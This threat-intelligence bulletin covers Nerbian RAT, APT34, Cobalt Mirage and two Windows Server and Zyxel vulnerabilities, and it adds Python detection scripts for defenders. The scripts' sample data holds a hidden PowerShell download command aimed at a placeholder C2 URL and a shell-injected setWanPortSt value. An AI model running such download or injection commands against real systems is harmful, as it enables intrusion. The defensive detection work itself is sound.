New Nerbian RAT Observed Utilizing Significant Anti-Analysis Techniques and COVID-19 Phishing Lures
In May 2022, Proofpoint researchers publicly identified a new remote access trojan called "Nerbian RAT" that uses COVID-19 and World Health Organization (WHO)-themed lures. They also determined that it has significant anti-analysis and anti-reversing capabilities. The researchers detailed that Nerbian RAT is written in Golang and uses various encryption routines to evade network analysis. The campaign was first observed by Proofpoint on April 26, 2022, when fewer than 100 emails were sent to various industries, mainly located in the United Kingdom, Spain, and Italy. The email body contained COVID-19 safety measures and symptoms, and the email carried a malicious Microsoft Word attachment. When macros are enabled in Word on the victim device, the victim sees a seven (7) page document containing COVID-19 information (specifically regarding self-isolation and how to care for those who have contracted the virus), as well as logos for the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI). In the background, the embedded macro drops a batch file that performs a PowerShell Invoke-WebRequest (IWR) to a specific URL, renames the downloaded file to "UpdateUAV[.]exe", and places it in the victim's "%AppData%/Roaming" folder. This executable serves as a dropper for Nerbian RAT and reuses code from multiple open-source GitHub projects to implement a significant set of anti-analysis and anti-reversing checks prior to deployment. If certain conditions are met, the tool stops executing. These conditions include "the existence of reverse engineering or debugging programs in the process list," hard disk names containing the strings "virtual", "vbox", or "vmware", or an elapsed execution time long enough for the malware to assume it is being debugged.
Checking for these conditions also ensures that the RAT is not running in a sandboxed, virtual environment, which is critical for long-term presence. Nerbian RAT was also observed having keylogging and screen capture capabilities, and researchers also detailed that the malware communicates to its command-and-control (C2) server over Secure Sockets Layer (SSL) with a "unique encryption scheme." An in-depth technical analysis of Nerbian RAT as well as indicators of compromise (IOCs) can be viewed in Proofpoint's report linked below.
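The delivery chain above (Word macro, batch file, PowerShell Invoke-WebRequest, UpdateUAV.exe written under %AppData%\Roaming) is well suited to endpoint process and file telemetry. The following is an added detection example written for this update, not code from Proofpoint's report; the events are constructed Sysmon-style records (event ID 1 process creation, event ID 11 file creation) and the download URL is a placeholder.

```python
import re

# Constructed Sysmon-style events (not real telemetry) reproducing the chain:
# WINWORD.EXE -> cmd.exe running a .bat -> powershell.exe with IWR ->
# UpdateUAV.exe dropped into %AppData%\Roaming. URL is a placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c C:\Users\bob\AppData\Local\Temp\run.bat"},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden iwr http://C2-URL-PLACEHOLDER/f -OutFile x.bin"},
    {"id": 11, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\bob\AppData\Roaming\UpdateUAV.exe"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
# Invoke-WebRequest and its alias, the download cradle used by the batch file.
IWR = re.compile(r"\b(invoke-webrequest|iwr)\b", re.IGNORECASE)


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def detect_nerbian_chain(events):
    """Return (stage, detail) pairs for each stage of the chain seen in events."""
    findings = []
    for e in events:
        if e["id"] == 1:  # process creation
            parent, image = basename(e.get("parent", "")), basename(e["image"])
            if parent in OFFICE_APPS and image in SHELLS:
                findings.append(("office_spawns_shell", e["cmd"]))
            if image in ("powershell.exe", "pwsh.exe") and IWR.search(e["cmd"]):
                findings.append(("powershell_download", e["cmd"]))
        elif e["id"] == 11:  # file creation
            target = e["target"].lower()
            if "\\appdata\\roaming\\" in target and target.endswith("\\updateuav.exe"):
                findings.append(("dropper_written", e["target"]))
    return findings


if __name__ == "__main__":
    for stage, detail in detect_nerbian_chain(SAMPLE_EVENTS):
        print(f"{stage}: {detail}")
```

The first two stages are generic Office-spawned-shell and download-cradle signals that also catch variants; the third is specific to the filename Proofpoint reported and will miss renamed droppers.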
Threat Actor Activity
APT34 Launches New Phishing Campaign
Iranian threat actors from APT34 are believed to be behind a new phishing campaign intended to deliver a modernized version of the Saitama backdoor. The phishing emails contain simple one-line statements from fake Government of Jordan officials stating that the user must open and fill out an attached form called "Confirmation Receive Documents.xls" to receive their pending documents. Once the user opens the malicious attachment, Excel displays a workbook in which a textbox states "Press 'Enable Editing' then Press 'Enable Content' to show Content of Document." After the macros are enabled, scripts embedded within the file execute and install the Saitama backdoor. Saitama masks its communications to threat actor endpoints by abusing the DNS protocol. Furthermore, the backdoor is configured to communicate with the command-and-control (C2) server at least once every 6-8 hours. To lessen the chance of compromise, CTIX analysts recommend that users vet every email before opening attachments or following hyperlinks within it, and that security teams establish phishing-specific security controls.
Iranian "Cobalt Mirage" APT Discovered Deploying Ransomware, Exfiltrating Data
Secureworks Counter Threat Unit researchers discovered a campaign that has been running since at least June 2020 and have attributed the activity to the "Cobalt Mirage" threat group. The Cobalt Mirage group is an Iranian state-sponsored threat actor that has close ties to the "Cobalt Illusion," "Phosphorous," and "TunnelVision" APTs. The threat group targets organizations in Israel, the U.S., Europe, and Australia. The researchers have broken down the Cobalt Mirage operation into two (2) distinct clusters. Cluster A has been found to use BitLocker and DiskCryptor to "conduct opportunistic ransomware attacks for financial gain," while Cluster B "focuses on targeted intrusions to gain access and collect intelligence, but some of the activity has experimented with ransomware." Both clusters have been known to conduct "scan-and-exploit" activity, exploiting known vulnerabilities in applications such as Fortinet FortiOS and Microsoft Exchange, as well as the ProxyShell vulnerability. In their most recent attacks at the beginning of 2022, the threat actors used access obtained by exploiting the ProxyShell vulnerability to target a U.S. philanthropic organization. During the attack, Cobalt Mirage deployed custom malware based on the Fast Reverse Proxy application, a well-known tool used for directly connecting to devices behind a firewall. The threat actors then used a Local Security Authority Server Service (LSASS) credential dump to pivot across the network. Finally, BitLocker was deployed on three (3) workstations and a ransom note was sent to a local printer with a contact email address and Telegram account. In March 2022, Cluster B used techniques similar to those used on the philanthropic organization to target a U.S. local government network, but focused on exfiltrating data rather than deploying ransomware.
Due to the threat group's technique of remaining dormant for months at a time, CTIX analysts recommend all organizations scan their network for indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) relating to the Cobalt Mirage APT.
Actively Exploited Windows Server Vulnerability Allows Attackers to Take Full Domain Control
Microsoft patched a critical zero-day Windows Server Local Security Authority (LSA) spoofing vulnerability which has been exploited in the wild, allowing threat actors to escalate their privileges and gain full control of the domain. LSA is a Windows subsystem used to enforce the security policies on local and remote machines. The flaw, tracked as CVE-2022-26925, appears to be related to the infamous "PetitPotam" Windows New Technology LAN Manager (NTLM) relay attacks on Active Directory Certificate Services (AD CS), first identified in the summer of 2021 and abused by the "LockFile" ransomware group. Although critical, this is a highly complex attack that requires sophisticated threat actors to conduct a Man-in-the-Middle (MITM) attack to request a method on the LSA Remote Procedure Call (LSARPC) interface. This could allow them to remotely intercept legitimate authentication requests, coercing the domain controller to authenticate to the attackers via the NTLM security protocol. Once the attackers have control, they can execute malware, leak sensitive data, and carry out other malicious network activity. The security update fixes the vulnerability by detecting and blocking anonymous LSARPC connection attempts. This flaw affects all versions of Windows Server, and according to Microsoft's advisory, "domain controllers should be prioritized in terms of applying security updates." Additional manual hardening techniques for mitigating NTLM relay attacks in general are detailed in the Windows advisory linked below. The CTIX team urges any and all Windows network administrators to ensure their infrastructure reflects the most current security posture and that they have added defense-in-depth protection against NTLM attacks.
Zyxel Patches Critical Vulnerability Affecting Thousands of their Firewall Products
Zyxel Networks has fixed a critical vulnerability in their firewall firmware that could allow threat actors to take full control of a vulnerable device as an initial access vector and then move laterally across the target network to conduct other malicious activity. Zyxel is a networking service provider that provides security, AI, and cloud solutions to corporate networks. The flaw, tracked as CVE-2022-30525, is described as an unauthenticated remote code execution (RCE) vulnerability in the administrative HTTP interface, impacting Zyxel Zero Touch Provisioning (ZTP) supported firewall products. These devices are very popular and are scaled for both small corporate branch and corporate headquarters deployments, and typically offer services like VPN, SSL inspection, intrusion detection/protection, and corporate email security. The vulnerability was disclosed by researchers from the Rapid7 cybersecurity firm, who, at the time their report was published, stated that via Shodan IoT scans they had identified at least 15,000 vulnerable instances of these products connected to the internet. The researchers also published a Proof-of-Concept (PoC) exploit, creating a Metasploit module which exploits a command injection exposed by "/ztp/cgi-bin/handler" when the handler processes "setWanPortSt" commands. The Metasploit module adds operating system commands to a "setWanPortSt" field, allowing the attacker to execute commands as the "nobody" user. Typically, Rapid7 follows a 60-day disclosure policy for responsibly reporting known exploits; however, Zyxel patched this flaw in secret on April 28th, 2022, which puts network and cybersecurity personnel at a disadvantage. When patches are released, both hackers and security professionals reverse-engineer the patch to identify the exact exploitation details, allowing attackers to attempt variations of the exploit and security personnel to understand how best to defend against those types of attacks.
By patching silently, a vendor ensures that only the attackers tend to find the patch, because they are always scanning and probing the internet for vulnerabilities, unlike defenders, who typically only reverse-engineer patches when their advisories are published. Given this, Rapid7 decided to publish their vulnerability report early so that defenders would be aware of the threats to their infrastructure and could begin proactively defending against similar attacks or variants that bypass the security patch. The CTIX team urges all Zyxel firewall customers to update to the latest patch immediately and to enable automatic updates. Rapid7 also recommends disabling WAN access to the administrative HTTP interface.
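Because the injected value travels in the POST body to "/ztp/cgi-bin/handler", access logs without bodies will not show it; a reverse proxy or WAF record that captures the body will. The following is an added triage example written for this update (not Rapid7's module or Zyxel's code): it flags handler requests arriving from non-RFC1918 addresses, which the WAN-access recommendation above says should never occur, and "setWanPortSt" bodies whose string fields carry shell metacharacters. The records and the "arg" field name are constructed for illustration.

```python
import ipaddress
import json
import re

ZTP_HANDLER = "/ztp/cgi-bin/handler"
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Shell metacharacters that have no place in a WAN-port configuration value.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")

# Constructed proxy/WAF records with request bodies (not real traffic).
# The "arg" field name is a placeholder, not Zyxel's real parameter name.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "POST", "path": ZTP_HANDLER,
     "body": '{"command":"setWanPortSt","proto":"dhcp","port":"4","arg":"1500; CONSTRUCTED-PLACEHOLDER"}'},
    {"src": "10.0.0.5", "method": "POST", "path": ZTP_HANDLER,
     "body": '{"command":"setWanPortSt","proto":"dhcp","port":"4","arg":"1500"}'},
    {"src": "10.0.0.5", "method": "GET", "path": "/", "body": ""},
]


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in RFC1918)


def triage_request(req):
    """Return reasons this request looks like CVE-2022-30525 activity (empty if none)."""
    reasons = []
    if req["path"] != ZTP_HANDLER:
        return reasons
    if is_external(req["src"]):
        reasons.append("ztp handler reached from non-RFC1918 address")
    try:
        body = json.loads(req["body"] or "{}")
    except json.JSONDecodeError:
        return reasons + ["unparseable body sent to ztp handler"]
    if body.get("command") == "setWanPortSt":
        tainted = [k for k, v in body.items() if isinstance(v, str) and SHELL_META.search(v)]
        if tainted:
            reasons.append("shell metacharacters in setWanPortSt field(s): " + ",".join(tainted))
    return reasons


def triage_all(reqs):
    hits = [(r["src"], triage_request(r)) for r in reqs]
    return [(src, why) for src, why in hits if why]


if __name__ == "__main__":
    for src, why in triage_all(SAMPLE_REQUESTS):
        print(src, "->", "; ".join(why))
```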
The Ankura semi-weekly Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The following is a collection of cyber threat intelligence leads assembled over the past few days; it typically includes high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to Flash (email@example.com) if additional context is needed.
© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.